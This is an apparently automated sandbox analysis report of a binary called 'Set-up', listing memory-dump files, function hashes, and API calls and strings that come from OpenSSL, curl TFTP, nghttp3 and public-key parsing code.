Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35dd7c2079c1fa6b0087e2d2de5362958a200034a8dd1f6b3a61df2fc508b35e
Instruction ID: c5dc07697e3d280bb61b9906db8fab4792da6c3349ae47cc700a882f3f16756e
Opcode Fuzzy Hash: 35dd7c2079c1fa6b0087e2d2de5362958a200034a8dd1f6b3a61df2fc508b35e
Instruction Fuzzy Hash: EA71D4751043068BC71AAF6CD4D0169FBF1BF88310F69CAADEA9987342D634EC95CB80

Function 0039A800 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5b506c9d8ef60c1196b6751c9ec9814b419d642104004d7291babe28335ee3e
Instruction ID: e936e7c0c12c7f3f64180f17d2a2640c449d4ef8c48467a6769175082a1dddc0
Opcode Fuzzy Hash: e5b506c9d8ef60c1196b6751c9ec9814b419d642104004d7291babe28335ee3e
Instruction Fuzzy Hash: 0671D47150871A8BCB1A9F6DD5D4169FBE1BF88300F1A8B6DD98987342D334EC95CB81

Function 00194170 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
Instruction ID: 867018a68a29253b82a8d83ceb09723be52383eef51e5fcf44bc332910112d20
Opcode Fuzzy Hash: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
Instruction Fuzzy Hash: D1512676B093514BDB148E6C948066EB7E1FB9A318F2947BCD4DA8B352C320DD47C791

Function 0039A610 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
Instruction ID: cb8fd5e88f90a5309978d719dab71e044a8b61962371602cfef81162fd37fdfc
Opcode Fuzzy Hash: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
Instruction Fuzzy Hash: 70519E76A08A258BCB199F99C1D0029FBF2BB88304F16C76DD99967741C330AD64CBC2

Function 003AA000 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
Instruction ID: 436da437a033c1e89490651f3714567b66ba1e17c8a88c797f1ac603bd49345f
Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
Instruction Fuzzy Hash: 6831C232308B1A4BC755EE69C4C022BF6D7DBDA360F55C63DE589C3780EA718C48C682

Function 002184A0 Relevance: 60.4, APIs: 24, Strings: 16, Instructions: 382stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 002185B6
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ANY PRIVATE KEY), ref: 002185CC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PARAMETERS), ref: 002185E2
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X9.42 DH PARAMETERS), ref: 002185F8
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,DH PARAMETERS), ref: 0021860A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X509 CERTIFICATE), ref: 00218620
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 00218634
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NEW CERTIFICATE REQUEST), ref: 0021864A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE REQUEST), ref: 0021865C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 00218672
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 002186A0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 002186BA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS #7 SIGNED DATA), ref: 002186D0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 002186E2
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 002186FC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 00218712
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 0021872A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 00218686

Part of subcall function 001FCBC0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,001D7254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,001D40BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001FCBD2

Strings

Expecting: , xrefs: 00218908
crypto/pem/pem_lib.c, xrefs: 002184F6, 00218509, 0021851F, 00218545, 0021855A, 00218572, 002188CE, 00218935, 00218948, 0021895F, 00218977, 0021898C, 002189A5, 002189CB
PRIVATE KEY, xrefs: 00218756, 00218787
X9.42 DH PARAMETERS, xrefs: 002185F2
PARAMETERS, xrefs: 002185DC, 002187FB
PKCS #7 SIGNED DATA, xrefs: 002186CA
ENCRYPTED PRIVATE KEY, xrefs: 00218740
X509 CERTIFICATE, xrefs: 0021861A
NEW CERTIFICATE REQUEST, xrefs: 00218644
CERTIFICATE, xrefs: 0021862E, 0021866C
CERTIFICATE REQUEST, xrefs: 00218656
TRUSTED CERTIFICATE, xrefs: 00218680, 0021869A
CMS, xrefs: 002186F6, 00218724
PKCS7, xrefs: 002186B4, 002186DC, 0021870C
ANY PRIVATE KEY, xrefs: 002185C6
DH PARAMETERS, xrefs: 00218604

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strcmp$free
String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$Expecting: $NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS$crypto/pem/pem_lib.c
API String ID: 3401341699-4246700284
Opcode ID: 612fdbbb81e826c37f0a40061ce9fff70b6424cb9753b2ef2100e3d54366f7c3
Instruction ID: d36e7109b7c0f70c68755576f38557f3ba22050990a73dcb7598c10db95cd52e
Opcode Fuzzy Hash: 612fdbbb81e826c37f0a40061ce9fff70b6424cb9753b2ef2100e3d54366f7c3
Instruction Fuzzy Hash: 95B139B5A1030666D6216E207C83FFB33C99F71749F080828FD14A52C3FFA5D6659AA2

Function 00092010 Relevance: 51.2, APIs: 11, Strings: 18, Instructions: 414stringnetworkCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0009204A
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00092068
WSAGetLastError.WS2_32 ref: 000920DE
recvfrom.WS2_32(?,?,?,00000000,?,00000080), ref: 0009214D
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 00092365
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 0009238F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000923B9
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 0009241D
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 000924AD

Strings

blksize parsed from OACK, xrefs: 00092332
invalid blocksize value in OACK packet, xrefs: 0009251F
got option=(%s) value=(%s), xrefs: 000923E8
server requested blksize larger than allocated, xrefs: 00092552
tsize, xrefs: 0009248D
%s (%ld), xrefs: 000924D8, 00092557
blksize, xrefs: 000923FC
Internal error: Unexpected packet, xrefs: 000922C4
TFTP error: %s, xrefs: 0009228B
tsize parsed from OACK, xrefs: 000924D3
blksize is larger than max supported, xrefs: 0009253C
Received too short packet, xrefs: 00092169
Malformed ACK packet, rejecting, xrefs: 00092514
blksize is smaller than min supported, xrefs: 00092545
requested, xrefs: 0009232C
%s (%d) %s (%d), xrefs: 00092337
%s (%d), xrefs: 0009254A
invalid tsize -:%s:- value in OACK packet, xrefs: 00092573

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _time64memchrstrtol$ErrorLastrecvfromstrlen
String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$Internal error: Unexpected packet$Malformed ACK packet, rejecting$Received too short packet$TFTP error: %s$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
API String ID: 3302935713-3407012168
Opcode ID: 1d1d41625107fc619fbbd7ad56a87c76880980dc4fa5536c8d8b45bda7404a93
Instruction ID: 641c37342d15f4fd8f2d887449413b77a6e90db7c0c1bd299d813c85c810503e
Opcode Fuzzy Hash: 1d1d41625107fc619fbbd7ad56a87c76880980dc4fa5536c8d8b45bda7404a93
Instruction Fuzzy Hash: 27E12471A04301BBDB209B24DC46B6FBBE5FF95710F088528F8599B292E774EE10D792

Function 000CA140 Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 341COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 000CA29A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000000F,?,?), ref: 000CA2C5
memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 000CA2E3

Part of subcall function 000CA5A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 000CA5FC

Strings

rblk->n >= NGHTTP3_KSL_MIN_NBLK + n, xrefs: 000CA551
n > 0, xrefs: 000CA53C, 000CA57B
lblk->n >= NGHTTP3_KSL_MIN_NBLK + n, xrefs: 000CA527
lblk->n <= NGHTTP3_KSL_MAX_NBLK - n, xrefs: 000CA566
i > 0, xrefs: 000CA4E8, 000CA590
rblk->n <= NGHTTP3_KSL_MAX_NBLK - n, xrefs: 000CA512
node->blk->n == NGHTTP3_KSL_MIN_NBLK, xrefs: 000CA4D3
nghttp3_ksl.c, xrefs: 000CA4CE, 000CA4E3, 000CA4F8, 000CA50D, 000CA522, 000CA537, 000CA54C, 000CA561, 000CA576, 000CA58B
i < blk->n - 1, xrefs: 000CA4FD

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: memcpy$memmove
String ID: i < blk->n - 1$i > 0$lblk->n <= NGHTTP3_KSL_MAX_NBLK - n$lblk->n >= NGHTTP3_KSL_MIN_NBLK + n$n > 0$nghttp3_ksl.c$node->blk->n == NGHTTP3_KSL_MIN_NBLK$rblk->n <= NGHTTP3_KSL_MAX_NBLK - n$rblk->n >= NGHTTP3_KSL_MIN_NBLK + n
API String ID: 1283327689-1606465060
Opcode ID: 68e23b202f0464a032d6affdb067484ee22d09f3a386abfd2a54e44a1d04916b
Instruction ID: bc04e581191da2d3b2ee29fb044cf4b4245416fd924070ebb98b18173a0e5568
Opcode Fuzzy Hash: 68e23b202f0464a032d6affdb067484ee22d09f3a386abfd2a54e44a1d04916b
Instruction Fuzzy Hash: D9C1B0717002099FC718DF14C886EAEB7E6FF99308F58852DE9498B292D770ED44CB92

Function 00114080 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 190fileCOMMON

Download Yara Rule

APIs

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,005E4675), ref: 00114094
feof.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 001140A3
rewind.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 001140B0
fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000001,00000000), ref: 001140D6
feof.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 001140F4
rewind.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00114101
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 0011410F
fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,00000000), ref: 0011413F
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 0011414C
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00114165
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00114186
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 001141A0
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000020,00000000), ref: 001141BA
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,00000020,00000000), ref: 001141E4

Strings

Unable to read public key from file, xrefs: 001141A8
Invalid public key data, xrefs: 0011422E
Unable to allocate memory for public key data, xrefs: 0011418E
Invalid key data, not base64 encoded, xrefs: 00114214
Invalid data in public key file, xrefs: 00114117
Unable to open public key file, xrefs: 001140BA
Missing public key data, xrefs: 0011417E

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: fclose$feoffreadmemchrrewind$fopenisspace
String ID: Invalid data in public key file$Invalid key data, not base64 encoded$Invalid public key data$Missing public key data$Unable to allocate memory for public key data$Unable to open public key file$Unable to read public key from file
API String ID: 752180523-3150497671
Opcode ID: 2029ca049d46952b50f34639f1407cadf983eda7bf3319fb6ed333d89a754bd0
Instruction ID: 94e3f2b72934a62d232d86ec51ae161496f347c8990fb3204f86801de8d6cb8c
Opcode Fuzzy Hash: 2029ca049d46952b50f34639f1407cadf983eda7bf3319fb6ed333d89a754bd0
Instruction Fuzzy Hash: AB510BF1A043047BD6186B35AC46E6B7A9CDF67765F040438FC4EC6282FB31E9948976

Function 000927E0 Relevance: 35.4, APIs: 4, Strings: 16, Instructions: 406stringnetworkCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00092AD7
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00092B3D
sendto.WS2_32(?,?,?,00000000,?,00000007), ref: 00092D30
WSAGetLastError.WS2_32 ref: 00092D3A

Strings

Connected for receive, xrefs: 0009290B, 0009298A
netascii, xrefs: 00092810, 00092B23
%lld, xrefs: 00092B82
tsize, xrefs: 00092BAD
0, xrefs: 00092B94
Connected for transmit, xrefs: 000929E0, 00092A34
blksize, xrefs: 00092C33
TFTP finished, xrefs: 0009289C
timeout, xrefs: 00092CD3
TFTP buffer too small for options, xrefs: 00092C60
tftp.c, xrefs: 00092B03, 00092C6E, 00092D62
octet, xrefs: 0009280B
tftp_send_first: internal error, xrefs: 0009295C
%s%c%s%c, xrefs: 00092B2A
TFTP filename too long, xrefs: 00092AF5
Internal state machine error, xrefs: 000928C5

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strlen$ErrorLastsendto
String ID: %lld$%s%c%s%c$0$Connected for receive$Connected for transmit$Internal state machine error$TFTP buffer too small for options$TFTP filename too long$TFTP finished$blksize$netascii$octet$tftp.c$tftp_send_first: internal error$timeout$tsize
API String ID: 3285375004-3063461439
Opcode ID: b669100b059977d4123cabc3308be66f48bced06719ea5879879ad09859c7644
Instruction ID: aa985d54976d175f52739cf94c39c4a5e91208aba62a8cab020f5877e6bdc5d1
Opcode Fuzzy Hash: b669100b059977d4123cabc3308be66f48bced06719ea5879879ad09859c7644
Instruction Fuzzy Hash: 7FE1D475A00301BBDB24AB24DC46FAE77D4AF56704F084568FD08AB293EB72E914D792

Function 00044720 Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 426stringCOMMON

Download Yara Rule

APIs

